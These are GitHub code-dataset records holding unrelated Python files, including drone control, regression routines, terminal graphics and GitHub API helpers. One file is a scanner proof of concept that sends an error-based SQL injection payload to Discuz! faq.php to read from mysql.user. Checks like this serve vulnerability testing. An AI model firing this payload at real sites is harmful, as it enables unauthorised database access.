Refinement (FR or GR)\n refinement(\n is_planar, oc, incomplete_segment, b_v, KDTree)\n complete_segments.append(incomplete_segment.union(b_v))\n if debug:\n colors = [np.random.rand(3) for _ in range(len(complete_segments))]\n draw_complete(complete_segments, points, colors)\n post = time()-start\n save_planes(complete_segments, output_path,\n cloud_path.rsplit('/', 1)[-1].replace('.txt', ''))\n save_time(elapsed, pre, post, output_path, output_path.rsplit(\n '/', 1)[-1], cloud_path.rsplit('/', 1)[-1].replace('.txt', ''))\n","repo_name":"lupeterm/OBRG-Py","sub_path":"obrg/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"70"}
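# A note on the record above: per the docstring of calculate(), the module's entry point
# takes a path to an unorganized XYZ point cloud and an output directory. A minimal usage
# sketch; the import path is inferred from the record's sub_path and the file names here
# are hypothetical placeholders:
from obrg.core import calculate

calculate('scan01.txt', 'planes_out/', debug=False)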
+{"seq_id":"24582289812","text":"import socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ntello_address = (\"192.168.10.1\", 8889)\nsock.bind((\"\", 9000))\nprint(\"Initiating startup sequence.\")\nsock.sendto(b\"command\", 0, tello_address)\nsock.sendto(b\"sdk?\", 0, tello_address)\nsock.sendto(b\"sn?\", 0, tello_address)\nsock.sendto(b\"battery?\", 0, tello_address)\ntick = 0\nwhile True:\n tick=tick+1\n if tick == 20:\n sock.sendto(b\"battery?\", 0, tello_address)\n try:\n data, ip = sock.recvfrom(1024)\n except KeyboardInterrupt:\n print(\"Exiting\")\n sock.close()\n break","repo_name":"bookworm0110/telloflying","sub_path":"tellodriving.py","file_name":"tellodriving.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26841755228","text":"import git\nimport datetime\n\n# Set the name, author and version number here\ndemo_name = \"CHANGE ME\"\nauthor = \"John H. Williamson\"\nversion = \"0.0.0\"\n\n\ndef get_git_info():\n \"\"\"Get current git details and return them as a dictionary\"\"\"\n repo = git.Repo(search_parent_directories=True)\n head = repo.head.commit\n git_info = {\n \"sha\": head.hexsha,\n \"date\": datetime.datetime.fromtimestamp(head.committed_date).isoformat(),\n \"author\": head.author.name,\n \"branch\": repo.active_branch.name,\n \"dirty\": repo.is_dirty(),\n }\n return git_info\n","repo_name":"johnhw/gl_pyo_template","sub_path":"version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12742080030","text":"'''was_stalled()\nTests whether the motor was stalled.\nReturns\nTrue if the motor has stalled since the last time was_stalled() was called, otherwise false.\nType:Boolean\nValues:True or False\nErrors\nRuntimeError\nThe motor has been disconnected from the Port.\nExample\n'''\nfrom spike import Motor\n\nmotor = Motor('A')\n\nmotor.set_stall_detection(True)\nmotor.run_for_rotations(2)\nif not motor.was_stalled():\n # the motor did not complete two rotations\n print(\"no stalled\")\n","repo_name":"rundhall/PC-LEGO-SPIKE-Simulator","sub_path":"example/13.Singel_motors/was_stalled.py","file_name":"was_stalled.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"70844662946","text":"import cProfile\n\nfrom pyinterpolate.processing.preprocessing.blocks import Blocks, PointSupport\nfrom pyinterpolate.variogram.regularization.deconvolution import Deconvolution\n\nDATASET = '../samples/cancer_data.gpkg'\nPOLYGON_LAYER = 'areas'\nPOPULATION_LAYER = 'points'\nPOP10 = 'POP10'\nGEOMETRY_COL = 'geometry'\nPOLYGON_ID = 'FIPS'\nPOLYGON_VALUE = 'rate'\nMAX_RANGE = 400000\nSTEP_SIZE = 20000\nMAX_ITERS = 5\n\nAREAL_INPUT = Blocks()\nAREAL_INPUT.from_file(DATASET, value_col=POLYGON_VALUE, index_col=POLYGON_ID, layer_name=POLYGON_LAYER)\nPOINT_SUPPORT_INPUT = PointSupport()\nPOINT_SUPPORT_INPUT.from_files(point_support_data_file=DATASET,\n blocks_file=DATASET,\n point_support_geometry_col=GEOMETRY_COL,\n point_support_val_col=POP10,\n blocks_geometry_col=GEOMETRY_COL,\n blocks_index_col=POLYGON_ID,\n use_point_support_crs=True,\n point_support_layer_name=POPULATION_LAYER,\n blocks_layer_name=POLYGON_LAYER)\n\ndef profile_reg():\n dcv = Deconvolution(verbose=False)\n dcv.fit_transform(agg_dataset=AREAL_INPUT,\n point_support_dataset=POINT_SUPPORT_INPUT,\n agg_step_size=STEP_SIZE,\n agg_max_range=MAX_RANGE,\n variogram_weighting_method='closest',\n max_iters=MAX_ITERS)\n\n return 0\n\n\nif __name__ == '__main__':\n cProfile.run('profile_reg()', filename='decon_v0.3.0.profile')\n","repo_name":"DataverseLabs/pyinterpolate","sub_path":"developer/dev_checks/profile/semivariance/profile_semivarogram_regularization.py","file_name":"profile_semivarogram_regularization.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"70"}
+{"seq_id":"2562407029","text":"from launch import LaunchDescription\nfrom launch_ros.actions import Node\nfrom launch.substitutions import LaunchConfiguration\nfrom ament_index_python import get_package_share_directory\nfrom launch.launch_description_sources import FrontendLaunchDescriptionSource\nfrom launch.actions import IncludeLaunchDescription\n\n\ndef generate_launch_description():\n \"\"\"Generate launch description with a single component.\"\"\"\n # ---------------- Params ----------------\n raptor_interface_params_file = LaunchConfiguration(\n \"raptor_interface_params\",\n default=[get_package_share_directory('ne_raptor_interface'),\n '/param/defaults.param.yaml']\n )\n dbc_file_path = get_package_share_directory('raptor_dbw_can') + \\\n '/launch/New_Eagle_DBW_3.3.542.dbc'\n\n socketcan_launch = IncludeLaunchDescription(\n FrontendLaunchDescriptionSource(\n [get_package_share_directory('ros2_socketcan'), '/launch/socket_can_bridge.launch.xml']\n )\n )\n\n # ---------------- Nodes ----------------\n return LaunchDescription(\n [\n Node(\n package='ne_raptor_interface',\n executable='ne_raptor_interface_node_exe',\n output='screen',\n namespace='vehicle',\n parameters=[raptor_interface_params_file],\n ),\n Node(\n package='raptor_dbw_can',\n executable='raptor_dbw_can_node',\n output='screen',\n namespace='vehicle',\n parameters=[\n {'dbw_dbc_file': dbc_file_path}\n ],\n remappings=[\n ('can_rx', '/to_can_bus'),\n ('can_tx', '/from_can_bus')\n ],\n ),\n socketcan_launch\n ])\n\n\ngenerate_launch_description()\n","repo_name":"autocore-ai/AutowareAuto","sub_path":"src/drivers/ne_raptor_interface/launch/ne_raptor_interface.launch.py","file_name":"ne_raptor_interface.launch.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"70"}
+{"seq_id":"37555543716","text":"invertida = \"\"\r\nc = \"\"\r\ncnt = 0\r\nwith open(\"/home/diego/Escritorio/prueba.txt\",'r') as a:\r\n#with open(\"d:\\\\noticia.txt\",'r') as a:\r\n for linea in a:\r\n print(linea, end =\"\")\r\n c = c + linea\r\n cnt += 1\r\n print(\"\\n\")\r\n print(\"*\"*50+\"\\n\")\r\nwith open(\"/home/diego/Escritorio/prueba.txt\",'r') as a:\r\n#with open (\"d:\\\\noticia.txt\")as a:\r\n linea = 0\r\n for leefrase in c:\r\n if linea==cnt-2:\r\n invertida = \"\\n\" + leefrase + invertida\r\n else:\r\n invertida = leefrase + invertida\r\n linea += 1\r\nprint(\"Archivo invertido: \")\r\nprint(\"{0}\".format(invertida))\r\nwith open(\"/home/diego/Escritorio/prueba2.txt\",'w') as d:\r\n#with open(\"d:\\\\noticia2.txt\",'w') as d:\r\n d.write(invertida)\r\n \r\n \r\n \r\n","repo_name":"DotPin/INFO290","sub_path":"Analisis de Sistemas Lineales/Documentacion/clase9.py","file_name":"clase9.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31562678483","text":"def batch_gradient_descent(X, Y, eta, epochs, percent):\n '''Esta funcion se utiliza para implimentar el método de regresión lineal Batch Gradiente Descent\n batch_gradient_descent(X, Y, eta, epocs) where:\n X: DataFrame de instancias o features\n Y: DataFrame de targets\n eta: tasa de aprendizaje (learning rate)\n epochs: numero máximo de iteraciones\n percent: % de datos que seran utilizados para el test (base 100)\n \n ------------------------------------\n Return:\n In order: theta, test_index, train_index, Y_predict, J_log\n \n theta: valores correspondientes a theta_n\n test_index: data test index\n train_index: data training index\n Y_predict: Y predict values\n J_log: errores por numero de epoca\n '''\n import numpy as np\n import pandas as pd\n import random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m))\n \n for element in test_index:\n train_index.remove(element)\n \n \n X_train = X.iloc[train_index]\n X_test = X.iloc[test_index]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # Entrenamiento\n \n theta = np.random.randn((X.shape[1] + 1), 1)\n \n J_log = np.zeros(epochs)\n \n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n\n for i in range(epochs):\n J_log[i] = (2 / m) * ((X_b@theta - Y_train)**2).sum()\n gradients = (1 / m) * (X_b.T @ (X_b @ theta - Y_train)) \n theta = theta - eta * gradients\n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict, J_log\n\n\ndef normal_equation(X, Y, percent):\n '''Esta función sirve para utilizar el método de regresión lineal con ecuación normal\n normal_equation(X, Y, percent): \n X: Dataframe de inputs \n Y: Dataframe de outputs\n percent: % de datos que seran utilizados para el test (base 100)\n \n Return: theta, test_index, train_index, Y_predict\n \n test_index: indices de los valores utilizados para el test\n train_index: indices de los valores utilizados para el entrenamiento\n theta: valores correspondientes a theta_n\n Y_predict: valores de Y obtenidos de la predicción\n '''\n import numpy as np\n import pandas as pd\n import random as random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m)) \n \n for indice in test_index:\n train_index.remove(indice)\n\n X_train = np.c_[X.iloc[train_index]]\n X_test = np.c_[X.iloc[test_index]]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # Entrenamiento\n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n theta = np.linalg.inv(X_b.T @ X_b) @ X_b.T @ Y_train\n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict\n\n\ndef stochastic_gradient_descent(X, Y, eta, epochs, percent, batch_size):\n import numpy as np\n import pandas as pd\n import random as random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m))\n \n for element in test_index:\n train_index.remove(element)\n \n X_train = X.iloc[train_index]\n X_test = X.iloc[test_index]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # 
Entrenamiento\n \n theta = np.random.randn((X.shape[1] + 1), 1)\n \n J_log = np.zeros(epochs)\n \n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n\n for i in range(epochs):\n start = i * batch_size % X_b.shape[0] \n end = min(start + batch_size, X_b.shape[0])\n idx = np.arange(start, end)\n batchX = X_b[idx]\n batchY = Y_train[idx]\n \n J_log[i] = (2 / m) * ((batchX @theta - batchY)**2).sum()\n gradients = (1 / m) * (batchX.T @ (batchX @ theta - batchY)) \n theta = theta - eta * gradients\n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict, J_log\n\ndef mini_batch_gradient_d(X, Y, eta, epochs, percent, b_size):\n import numpy as np\n import pandas as pd\n import random as random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m)) \n for element in test_index:\n train_index.remove(element)\n \n X_train = X.iloc[train_index]\n X_test = X.iloc[test_index]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # Entrenamiento\n\n theta = np.random.randn((X.shape[1] + 1), 1)\n \n J_log = np.zeros(epochs)\n \n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n \n batch_size = b_size\n\n for i in range(epochs):\n mini_batches = create_mini_batches(X_b, Y_train, batch_size)\n for mini_batch in mini_batches:\n X_mini, Y_mini = mini_batch\n J_log[i] = (2 / m) * ((X_mini @theta - Y_mini)**2).sum()\n gradients = (1 / m) * (X_mini.T @ (X_mini @ theta - Y_mini)) \n theta = theta - eta * gradients \n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict, J_log\n \ndef create_mini_batches(X, Y, batch_size):\n import numpy as np\n mini_batches = []\n data = np.hstack((X, Y))\n np.random.shuffle(data)\n n_minibatches = data.shape[0] // batch_size\n i = 0\n \n for i in range(n_minibatches + 1):\n mini_batch = data[i * batch_size:(i + 1)*batch_size, :]\n X_mini = mini_batch[:, :-1]\n Y_mini = mini_batch[:, -1].reshape((-1, 1))\n mini_batches.append((X_mini, Y_mini))\n if data.shape[0] % batch_size != 0:\n mini_batch = data[i * batch_size:data.shape[0]]\n X_mini = mini_batch[:, :-1]\n Y_mini = mini_batch[:, -1].reshape((-1, 1))\n mini_batches.append((X_mini, Y_mini))\n return mini_batches\n \n","repo_name":"SaulGQB/Aprendizaje-Automatico-Proyecto-1","sub_path":"multivariate_linear_regression.py","file_name":"multivariate_linear_regression.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
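# A note on the record above: a minimal usage sketch for batch_gradient_descent on
# synthetic data; the DataFrames and hyperparameters are illustrative, not from the repo:
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
X = pd.DataFrame(rng.random((100, 2)), columns=['x1', 'x2'])
# Linear target with a little noise: y = 1 + 3*x1 - 2*x2
Y = pd.DataFrame(1 + 3 * X['x1'] - 2 * X['x2'] + 0.1 * rng.standard_normal(100))

theta, test_idx, train_idx, Y_pred, J_log = batch_gradient_descent(X, Y, 0.1, 500, 20)
print(theta)  # should approach [[1], [3], [-2]] (bias, x1, x2)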
+{"seq_id":"4065302112","text":"#Gary Zeri\r\n#2321569\r\n#zeri@chapman.edu\r\n#CPSC230-10\r\n#For Fun\r\n\r\nimport sys\r\nimport shutil\r\n\r\n#graphic Terminal class\r\n#provides a set of tools to python developers to work with creating terminal artwork\r\nclass terminalGraphics():\r\n\r\n #global variables defined here\r\n\r\n #init empty screen matrix\r\n screen = []\r\n\r\n #x is total length of terminal, and y is total height of terminal in text lines\r\n length = 0\r\n height = 0\r\n\r\n #where should screen be positioned relative to the overall terminal?\r\n #current value is only \"center\", or \"full\"\r\n #center draws screen in geographic x,y center of the terminal\r\n #bott-left, means that the bottom left of the screen should be drawn onto the bottom left of the terminal\r\n screenPosition=\"\"\r\n\r\n###############################################################################\r\n\r\n #initialization function for the terminal graphics class\r\n #returns new instance of the terminalGraphics class\r\n #self, reference to instance of the terminal graphics class\r\n #forcedSize, is [length,height] size of virtual screen that should be forced to be maintained, despite larger terminal screen\r\n #screenPosition, string representing where virtual screen should be drawn onto the screen, please see above line where variable is defined for further information on keywords usable\r\n def __init__(self, forcedSize=False, screenPosition=\"bott-left\"):\r\n\r\n #check if screen size is to be forced to certain dimensions\r\n #if not, then use full terminal size as screen size\r\n if(forcedSize == False):\r\n #get dimensions of terminal screen\r\n dimensions = shutil.get_terminal_size()\r\n\r\n #set to total dimensions of terminal to global x and y variables\r\n #subtract one to account for lists begining to count from 0\r\n self.height = dimensions.lines - 1\r\n self.length = dimensions.columns -1\r\n\r\n #if forced size was specifed, then set screen height and width to specifed sizes\r\n else:\r\n self.height = forcedSize[1]\r\n self.length = forcedSize[0]\r\n\r\n #set screenPosition to specifed value, or default value\r\n self.screenPosition = screenPosition\r\n\r\n #update virtual screen object\r\n self.clearScreen()\r\n\r\n###############################################################################\r\n\r\n #newScreen function\r\n #returns a new empty screen based upon the current screen size\r\n #self, refers to current instance of the terminalGraphics class\r\n def newScreen(self):\r\n\r\n #create empty new screen\r\n screen = []\r\n\r\n ##initialize empty text matrix with one index for each vertical text line in the terminal\r\n #and within that index initialize an empty string for each text column on the terminal\r\n #final result is a virtual \"screen matrix\" where each text \"pixel\" can be accessed via screen[yPosition][xPosition]\r\n for y in range(self.height):\r\n screen.append([])\r\n for x in range(self.length):\r\n screen[y].append(\" \")\r\n\r\n #return empty screen\r\n return screen\r\n\r\n###############################################################################\r\n\r\n #clearScreen function\r\n #has no return value\r\n #self, reference to terminalGraphics class instance\r\n def clearScreen(self):\r\n\r\n #set screen to an empty screen matrix\r\n self.screen = self.newScreen()\r\n\r\n###############################################################################\r\n\r\n #refresh fucntion\r\n #has no return value\r\n #self, instance of the terminalGraphics 
class\r\n def refresh(self):\r\n\r\n #get dimensions of terminal\r\n dimensions = shutil.get_terminal_size()\r\n\r\n #check where screen should be positioned\r\n #if screen should be placed at the center of the terminal,\r\n #then get appropriate padding for the top, bottom, and the sides of the screen\r\n if(self.screenPosition == \"center\"):\r\n\r\n #calculate how many lines should be above and below the game screen in order to center the screen\r\n verticalPadding = (dimensions.lines - self.height - 1) // 2\r\n upperPadding = verticalPadding\r\n lowerPadding = verticalPadding\r\n\r\n #calculate how many spaces should be to the left and right of the screen\r\n horizontalPadding = (dimensions.columns - self.length - 1) // 2\r\n\r\n #get spacing before and after screen line to print\r\n spacingL = \" \" * horizontalPadding\r\n spacingR = spacingL + \"\\n\"\r\n\r\n #if the bottom left of the screen is to be drawn onto the bottom left of the terminal then do so\r\n elif(self.screenPosition == \"bott-left\"):\r\n spacingL = \"\"\r\n spacingR = \"\\n\"\r\n upperPadding = self.height - dimensions.lines\r\n lowerPadding = 0\r\n\r\n #print a carriage return to clear the terminal and print the screen to it\r\n sys.stdout.write(\"\\r\")\r\n\r\n #init empty string to hold total lines to print\r\n lineToPrint=\"\"\r\n\r\n #print out top level padding for screen\r\n for paddingLine in range(upperPadding):\r\n lineToPrint += \"\\n\"\r\n\r\n #for each line in the 2D representation of the terminal screen,\r\n #turn that line into a string and print it onto the terminal\r\n for line in self.screen:\r\n\r\n #add right spacing,\r\n lineToPrint += spacingL + \"\".join(line) + spacingR\r\n\r\n #print out bottom level padding for screen\r\n for paddingLine in range(lowerPadding):\r\n lineToPrint += \"\\n\"\r\n\r\n #print all of line to print excluding final newline char\r\n #immdeialty flush out the screen to the terminal to ensure smooth framerate\r\n print(lineToPrint)\r\n sys.stdout.flush()\r\n\r\n###############################################################################\r\n\r\n #drawPoint function\r\n #has no return value\r\n #self, reference to terminalGraphics class\r\n #point, [x,y] location of where to draw point\r\n #symbol, symbol to place at specifed point, default symbol is V\r\n def drawPoint(self, point, symbol=\"V\"):\r\n\r\n #access (x,y) point on the screen and set symbol at that point\r\n self.screen[self.height - point[1] - 1][point[0]] = symbol\r\n\r\n###############################################################################\r\n\r\n #drawVerticalLine function\r\n #self, reference to terminalGraphics class instance\r\n #x, integer refering to x value of vertical line\r\n #yPoint, [y0, y1], y values at which vertical line begins and ends\r\n def drawVerticalLine(self, x, yPoint, symbol=\"|\"):\r\n\r\n #calculate dy\r\n dy = yPoint[0] - yPoint[1]\r\n\r\n #iterate through all y-values of vertical line\r\n for y in range(abs(dy) + 1):\r\n\r\n #change absolute y value to y value relative to the user's terminal screen\r\n y += yPoint[0]\r\n\r\n #draw a point at the specifed x and y value,\r\n #use specifed x value, and calculated y value\r\n self.drawPoint([ x, y ], symbol)\r\n\r\n###############################################################################\r\n\r\n #drawline Functionn\r\n #has no return value\r\n #self, reference to instance of hte terminalGraphics class\r\n #point1, [x,y] point for starting point of a stright line\r\n #point2, [x,y] point for ending point of a 
straight line\r\n    #symbol, string of symbol that is used to draw a straight line\r\n    def drawLine(self, point1, point2, symbol=\"/\"):\r\n\r\n        #calculate delta x\r\n        dx = point1[0] - point2[0]\r\n\r\n        #calculate delta y\r\n        dy = point1[1] - point2[1]\r\n\r\n\r\n        #if dx is zero the slope is undefined, so draw a vertical line instead\r\n        if(dx == 0):\r\n            #draw a vertical line and return to avoid the division by zero below\r\n            self.drawVerticalLine(point1[0], [point1[1], point2[1]], symbol)\r\n            return\r\n\r\n        #calculate the slope of the line\r\n        m = dy / dx\r\n\r\n        #calculate b for y = mx + b\r\n        b = point1[1] - int(m*point1[0])\r\n\r\n        #loop through all x values needed to draw the line\r\n        for x in range(abs(dx)):\r\n\r\n            #change x from absolute coordinate system to one relative to the user's terminal screen\r\n            x += point1[0]\r\n\r\n            #draw a point at the specified x and y value,\r\n            #use y = mx + b to calculate the y value\r\n            self.drawPoint([ x, int(m*x) + b ], symbol)\r\n\r\n###############################################################################\r\n\r\n    #drawRect function\r\n    #has no return value\r\n    #self, reference to instance of terminalGraphics class\r\n    #length, int of horizontal width of box\r\n    #height, int of vertical height of box\r\n    #origin, [x,y] where left-bottom point of box is drawn\r\n    #verticalSymbol, text character to use to draw vertical sides of the rectangle\r\n    #horizontalSymbol, text character to use to draw horizontal sides of the rectangle\r\n    def drawRect(self, length, height, origin=[0,0], fill=\" \", verticalSymbol=\"|\", horizontalSymbol=\"-\"):\r\n\r\n        #REBUILD THIS METHOD\r\n        #iterate through all y and x positions\r\n\r\n        #iterate through all the dimensions needed to draw a box, (2)\r\n        for dimension in range(2):\r\n\r\n            yPosition = origin[1] + (dimension * height)\r\n            xPosition = origin[0] + (dimension * length)\r\n\r\n            #draw side lines with distance of \"length\" in between the two vertical lines\r\n            self.drawVerticalLine( xPosition, [origin[1], origin[1] + height], verticalSymbol )\r\n\r\n        for dimension in range(2):\r\n\r\n            yPosition = origin[1] + (dimension * height)\r\n            xPosition = origin[0] + (dimension * length)\r\n\r\n            #draw top and bottom of boxes with distance of \"height\" in between the horizontal lines\r\n            self.drawLine( [origin[0], yPosition], [origin[0] + length + 1, yPosition], horizontalSymbol )\r\n\r\n###############################################################################\r\n\r\n    #self is reference to instance of the terminalGraphics class\r\n    #text is string of text to print\r\n    #point refers to [x,y] coordinate of where first letter should be printed\r\n    def drawText(self, text, point):\r\n\r\n        #iterate through all chars within the text string\r\n        for charNumber in range(len(text)):\r\n\r\n            #calculate x and y position of current letter\r\n            x = charNumber + point[0]\r\n            y = point[1]\r\n\r\n            #draw letter at correct point\r\n            self.drawPoint([x,y], text[charNumber])\r\n\r\n###############################################################################\r\n\r\n    #loadImage function\r\n    #returns a screen list object with all the characters from an external file\r\n    #fileName, string of file to load image from\r\n    def loadImage(self, fileName):\r\n\r\n        #open file\r\n        f = open(fileName, \"r\")\r\n\r\n        #init empty image list\r\n        image = []\r\n        lineCounter = -1\r\n\r\n        #iterate through all lines and characters in file\r\n        for line in f:\r\n\r\n            #prepare new line in the image list\r\n            lineCounter += 1\r\n            image.append([])\r\n\r\n            for char in line:\r\n                if('\\n' != char):\r\n                    image[lineCounter].append(char)\r\n\r\n        
return image\r\n\r\n###############################################################################\r\n\r\n #addImage, takes image list and adds it to the screen\r\n #self, refers to instance of the terminalGraphics class\r\n #image, list of image text\r\n #x, x position of bottom left most point of the image, default value is 0\r\n #y, y position of the bottom left most point of the image, default value is 0\r\n def addImage(self, image, x=0, y=0):\r\n\r\n for lineNumber, line in enumerate(image):\r\n\r\n #get newY relative to the screen\r\n newY = lineNumber + len(self.screen) - len(image) - y\r\n\r\n for xPosition, char in enumerate(line):\r\n self.screen[newY][x+xPosition] = char\r\n","repo_name":"GaryZ700/viperEngine","sub_path":"viper/terminalGraphics/terminalGraphics.py","file_name":"terminalGraphics.py","file_ext":"py","file_size_in_byte":12139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
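# A note on the record above: a short usage sketch for the terminalGraphics class, using
# only the methods it defines (the sizes and coordinates are arbitrary examples):
if __name__ == "__main__":
    tg = terminalGraphics(forcedSize=[40, 10])
    tg.drawRect(20, 6, origin=[2, 1])   # 20x6 box with its bottom-left corner at (2, 1)
    tg.drawText("hello", [5, 3])        # write text inside the box
    tg.refresh()                        # flush the virtual screen to the terminal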
+{"seq_id":"3717767560","text":"import requests,re,urllib3\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\ndef scan(baseurl):\r\n\tif baseurl[-1]=='/':\r\n\t\tbaseurl=baseurl\r\n\telse:\r\n\t\tbaseurl=baseurl+\"/\"\r\n\turl=baseurl+\"faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23\"\r\n\theaders={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\"}\r\n\tresponse=requests.get(url,headers=headers,timeout=5,verify=False)\r\n\tif response.status_code == 200 and \"81dc9bdb52d04dc20036dbd8313ed055\" in response.text and \"Discuz! info: MySQL Query Error\" in response.text:\r\n\t\tr0=True\r\n\telse:\r\n\t\tr0=False\r\n\tif r0:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n","repo_name":"SCAMagic/SCAMagicScan","sub_path":"pocs/poc-yaml-discuz-v72-sqli.py","file_name":"poc-yaml-discuz-v72-sqli.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"70"}
+{"seq_id":"13427973469","text":"import requests\r\nimport json\r\nfrom urllib.request import urlopen\r\n\r\n\r\ndef userrepos(username):\r\n if not isinstance(username, str):\r\n return \"Username is not valid\"\r\n url=\"https://api.github.com/users/USER/repos\"\r\n newurl= url[:29]+ username+url[33:]\r\n try:\r\n userdata = urlopen(newurl)\r\n repolist=[]\r\n data = json.loads(userdata.read())\r\n for i in data:\r\n repolist.append(str(i['name']))\r\n return repolist\r\n except:\r\n return(\"User Does Not Exist Error\")\r\n\r\n\r\n\r\ndef repocommits(username, repo):\r\n if not isinstance(repo, str):\r\n return \"Repo is not valid\"\r\n url=\"https://api.github.com/repos/USER/repos/commits\"\r\n newurl= url[:29]+ username+url[33]+repo+url[39:]\r\n try:\r\n userdata = urlopen(newurl)\r\n commitlist=[]\r\n data = json.loads(userdata.read())\r\n for i in data:\r\n commitlist.append(str(i['commit']))\r\n numcommits=len(commitlist)\r\n return(\"Number of commits: \" ,numcommits)\r\n except:\r\n return(\"Repo does not exist\")\r\n\r\ndef combined(username,repo):\r\n if(userrepos(username)==\"User Does Not Exist Error\"):\r\n return \"User Does Not Exist Error\"\r\n return repocommits(username,repo)\r\n\r\n","repo_name":"Sdrucker6637/SSW567HW04a","sub_path":"hw04a.py","file_name":"hw04a.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42887758638","text":"import sqlite3 as sql\n\ndef colourSearch(c):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n colour_id = c\n cursor.execute('''SELECT * FROM Cars WHERE Colour=?''', (colour_id,))\n user = cursor.fetchall()\n print(user)\n db.close()\n\ndef locationSearch(l):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n location_id = l\n cursor.execute('''SELECT * FROM Cars WHERE Location=?''', (location_id,))\n user1 = cursor.fetchall()\n print(user1)\n db.close()\n\ndef seatSearch(s):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n seat_id = s\n cursor.execute('''SELECT * FROM Cars WHERE \"No. of Seats\"=?''', (seat_id,))\n user2 = cursor.fetchall()\n print(user2)\n db.close()\n\ndef doorSearch(d):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n door_id = d\n cursor.execute('''SELECT * FROM Cars WHERE \"No. of Doors\"=?''', (door_id,))\n user3 = cursor.fetchall()\n print(user3)\n db.close()\n\n\n#Min Price not working yet\n\ndef minPriceSearch(mn):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n minPrice_id = mn\n cursor.execute('''SELECT * FROM Cars WHERE LEN(Price) >= int(minPrice_id)''', (minPrice_id,))\n user4 = cursor.fetchall()\n print(user4)\n db.close()\n","repo_name":"sokhij3/B2-Group-Project","sub_path":"Updated Search Code.py","file_name":"Updated Search Code.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
